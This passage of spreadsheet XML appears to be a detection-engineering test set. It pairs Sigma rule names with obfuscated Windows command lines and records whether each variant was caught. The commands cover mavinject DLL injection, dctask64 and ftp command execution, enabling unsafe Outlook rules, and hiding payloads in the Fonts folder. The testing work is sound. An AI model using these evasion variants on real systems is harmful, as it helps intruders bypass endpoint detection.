          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1128" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1128" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1128" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1128" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -eXeCuTecMd64 "whoami"</t>
        </is>
      </c>
      <c r="F1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1128" s="43" t="n"/>
      <c r="J1128" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1128" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1129" ht="15.75" customHeight="1" s="42">
      <c r="A1129" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1129" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1129" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1129" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -"executecmd64" "whoami"</t>
        </is>
      </c>
      <c r="F1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1129" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1129" s="43" t="n"/>
      <c r="J1129" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1129" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1130" ht="15.75" customHeight="1" s="42">
      <c r="A1130" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1130" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1130" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1130" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1130" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -ExEcuTECmD64 "whoami"</t>
        </is>
      </c>
      <c r="F1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1130" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1130" s="43" t="n"/>
      <c r="J1130" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1130" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1131" ht="15.75" customHeight="1" s="42">
      <c r="A1131" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1131" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1131" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1131" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -EXECUTecMd64 "whoami"</t>
        </is>
      </c>
      <c r="F1131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1131" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1131" s="43" t="n"/>
      <c r="J1131" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1131" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1132" ht="15.75" customHeight="1" s="42">
      <c r="A1132" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1132" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1132" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1132" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1132" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe /"executecmd64" "whoami"</t>
        </is>
      </c>
      <c r="F1132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1132" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1132" s="43" t="n"/>
      <c r="J1132" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1132" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1133" ht="15.75" customHeight="1" s="42">
      <c r="A1133" s="36" t="n"/>
      <c r="B1133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1133" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1133" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1133" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injECTrUnnING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1133" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1133" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1133" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1134" ht="15.75" customHeight="1" s="42">
      <c r="A1134" s="36" t="n"/>
      <c r="B1134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1134" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1134" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1134" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /InJecTRunninG C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1134" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1134" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1134" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1135" ht="15.75" customHeight="1" s="42">
      <c r="A1135" s="36" t="n"/>
      <c r="B1135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1135" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1135" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1135" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1135" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1135" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1135" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1136" ht="15.75" customHeight="1" s="42">
      <c r="A1136" s="36" t="n"/>
      <c r="B1136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1136" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1136" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1136" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 -"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1136" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1136" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1136" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1137" ht="15.75" customHeight="1" s="42">
      <c r="A1137" s="43" t="n"/>
      <c r="B1137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1137" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1137" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1137" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injeCtRuNNING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1137" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1137" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1137" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1137" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1138" ht="15.75" customHeight="1" s="42">
      <c r="A1138" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1138" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1138" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1138" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -A &lt; script.txt</t>
        </is>
      </c>
      <c r="F1138" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1138" s="36" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1138" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1138" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1139" ht="15.75" customHeight="1" s="42">
      <c r="A1139" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1139" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1139" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1139" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1139" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -a &lt; script.txt</t>
        </is>
      </c>
      <c r="F1139" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1139" s="36" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1139" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1139" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1140" ht="15.75" customHeight="1" s="42">
      <c r="A1140" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1140" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1140" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1140" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1140" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1140" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1140" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1140" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1141" ht="15.75" customHeight="1" s="42">
      <c r="A1141" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1141" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1141" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1141" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp /"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1141" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1141" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1141" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1142" ht="15.75" customHeight="1" s="42">
      <c r="A1142" s="43" t="n"/>
      <c r="B1142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1142" s="36" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1142" s="36" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1142" s="43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F1142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1142" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1142" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1142" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1142" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1143" ht="15.75" customHeight="1" s="42">
      <c r="A1143" s="43" t="n"/>
      <c r="B1143" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1143" s="36" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1143" s="36" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1143" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\runscripthelper.exe C:\Windows\Temp\not_suspicious.exe &amp;&amp; C:\Windows\Temp\not_suspicious.exe surfacecheck C:\path\to\script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F1143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1143" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1143" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1143" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1143" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1144" ht="15.75" customHeight="1" s="42">
      <c r="A1144" s="43" t="n"/>
      <c r="B1144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1144" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1144" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1144" s="36" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F1144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1144" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1144" s="43" t="n"/>
      <c r="J1144" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1144" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1145" ht="15.75" customHeight="1" s="42">
      <c r="A1145" s="43" t="n"/>
      <c r="B1145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1145" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1145" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1145" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1145" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1145" s="36" t="n"/>
      <c r="J1145" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1145" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1146" ht="15.75" customHeight="1" s="42">
      <c r="A1146" s="43" t="n"/>
      <c r="B1146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1146" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1146" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1146" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1146" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1146" s="36" t="n"/>
      <c r="J1146" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1146" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1147" ht="15.75" customHeight="1" s="42">
      <c r="A1147" s="43" t="n"/>
      <c r="B1147" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1147" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1147" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1147" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1147" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1147" s="36" t="n"/>
      <c r="J1147" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1147" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1148" ht="15.75" customHeight="1" s="42">
      <c r="A1148" s="43" t="n"/>
      <c r="B1148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1148" s="36" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1148" s="36" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1148" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\ps.exe &amp;&amp; C:\Windows\Temp\ps.exe - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F1148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1148" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1148" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1148" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1148" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1149" ht="15.75" customHeight="1" s="42">
      <c r="A1149" s="43" t="n"/>
      <c r="B1149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1149" s="36" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1149" s="36" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1149" s="36" t="inlineStr">
        <is>
          <t>powershell.exe "-" &lt; script.ps1</t>
        </is>
      </c>
      <c r="F1149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1149" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1149" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1149" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1150" ht="15.75" customHeight="1" s="42">
      <c r="A1150" s="43" t="n"/>
      <c r="B1150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1150" s="36" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1150" s="36" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1150" s="36" t="inlineStr">
        <is>
          <t>type script.ps1 | powershell.exe -</t>
        </is>
      </c>
      <c r="F1150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1150" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1150" s="43" t="n"/>
      <c r="J1150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1150" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1151" ht="15.75" customHeight="1" s="42">
      <c r="A1151" s="43" t="n"/>
      <c r="B1151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1151" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1151" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1151" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F1151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1151" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1151" s="43" t="n"/>
      <c r="J1151" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1151" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1152" ht="15.75" customHeight="1" s="42">
      <c r="A1152" s="43" t="n"/>
      <c r="B1152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1152" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1152" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1152" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F1152" s="36" t="b">
